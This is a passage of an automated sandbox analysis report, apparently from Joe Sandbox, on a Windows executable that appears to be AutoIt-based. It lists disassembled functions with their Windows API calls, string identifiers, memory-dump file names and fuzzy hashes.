                                                                                                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                        • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                        • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1454798553-0
                                                                                                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strncmp
                                                                                                                                        • String ID: Q\E
                                                                                                                                        • API String ID: 909875538-2189900498
                                                                                                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                                        APIs
                                                                                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                                        • API String ID: 2652923123-3941886329
                                                                                                                                        • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                                                                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                                        • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                                                                                                                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_strncmp
                                                                                                                                        • String ID: U$\
                                                                                                                                        • API String ID: 2666721431-100911408
                                                                                                                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                        • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                        • String ID: LPT
                                                                                                                                        • API String ID: 3035604524-1350329615
                                                                                                                                        • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                                                                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                                        • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                                                                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: \$h
                                                                                                                                        • API String ID: 4104443479-677774858
                                                                                                                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID: &
                                                                                                                                        • API String ID: 2931989736-1010288
                                                                                                                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: \
                                                                                                                                        • API String ID: 4104443479-2967466578
                                                                                                                                        • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                        • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                                        • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                        • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 00466825
                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                        • String ID: |
                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                        • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                        • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                        • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                        • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: '
                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                        APIs
                                                                                                                                        • _strlen.LIBCMT ref: 0040F858
                                                                                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                          • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                        • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$_sprintf_strlen
                                                                                                                                        • String ID: %02X
                                                                                                                                        • API String ID: 1921645428-436463671
                                                                                                                                        • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                        • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                        • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                        • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Combobox
                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                        • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                        • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                        • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                        • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                        • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                        • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                        • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                        • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00476CB0
